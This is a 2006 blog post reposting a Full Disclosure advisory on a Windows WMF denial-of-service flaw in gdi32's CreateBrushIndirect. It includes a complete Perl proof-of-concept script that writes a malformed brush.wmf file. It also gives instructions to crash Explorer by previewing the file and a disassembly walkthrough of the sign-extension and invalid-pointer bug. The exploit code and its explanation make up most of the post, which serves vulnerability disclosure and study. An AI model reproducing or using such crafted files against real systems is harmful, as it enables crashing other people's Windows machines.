Home > IT, Security > New 0-day WMF “Exploit”

New 0-day WMF “Exploit”

August 6th, 2006 Leave a comment Go to comments

First off... you'll noticed I put exploit in quotes... I haven't investigated this yet.... That's my plan for this evening... It's a crash which means a DoS.... whether you consider that an exploit or not is up to you...

Here's the original posting from FD

quote:
Posted by: cyanid-E
Description:

yet another 'windows meta file' (WMF) denial of service exploit.

System affected:

+ Windows XP SP2,
+ Windows 2003 SP1,
+ Windows XP SP1,
+ Windows XP
+ Windows 2003

Tech info:

page fault in gdi32!CreateBrushIndirect() because invalid pointer access.
Incorrect (short) to (void*) sign extension also present.

Exploit:

=== begin of brush.pl ===
#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by cyanid-E ";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF " \x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x
61\x6E\x69\x64";
print WMF " \x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x
00\x00\x00\x00";
print WMF " \x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00";
print WMF " \x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x
00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait \n";
=== end of brush.pl ===

Just run brush.pl and try to preview brush.wmf (or even browse folder
with brush.wmf in windows explorer).

Discovered:

06/24/2006; vendor informed but not answered

Further information from FD:

quote:
1. 'Bad' wmf record:

07 00 00 00

length of record (in words)

FC 02

type (CreateBrushIndirect)

08 00 00 00 00 00 00 80

'packed' (good old Win16 days) LOGBRUSH data:

08 00 - 'packed' lpStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])
00 00 00 00 - COLORREF (any)
00 80 - 'packed' lbHatch (any, signed)

2. Sign extension bug:

_CommonEnumMetaFile:
......
; normalize 'packed' LOGBRUSH
movzx eax, word ptr [ebx+6] ; lbStyle (UINT32(UINT16))
mov [ebp-0f8], eax
mov eax, [ebx + 8] ; COLORREF (as is)
mov [ebp-0f4], eax
movsx eax, word ptr [ebx+0c] ; < -- BUGBUG: lbHatch (UINT32(INT16))
lea eax, [ebp-0f8]
push eax
call _CreateBrushIndirect
......

3. Memory access to fake 'pointer to packed DIB' (lbHatch) bug:

cmp edi, 6 ; BS_DIBPATTERNPT == lbStyle
jz _go2crush
......
cmp edi, 8 ; BS_DIBPATTERN8X8 == lbStyle
jz _go2crush
......
_go2crush:
push esi
push 1
push eax, [ebp+10]
push eax
push dword ptr [ebp+0c] ; 1
push dword ptr [ebp+18] ; lpHatch (fake *packedDIB)
call _pbmiConvertInfo
......
......
_pbmiConvertInfo:
......
push ebx
mov ebx, [ebp+8] ; lpHatch (fake *packedDIB)
......
mov eax, [ebx] ; < -- BUGBUG: crush or random (in first 0x7f00 bytes)
; memory access (see @ 0x3000 region)


I'll keep people informed as I play with it...

Peace,
HT
Categories: IT, Security Tags:
  1. No comments yet.
  1. No trackbacks yet.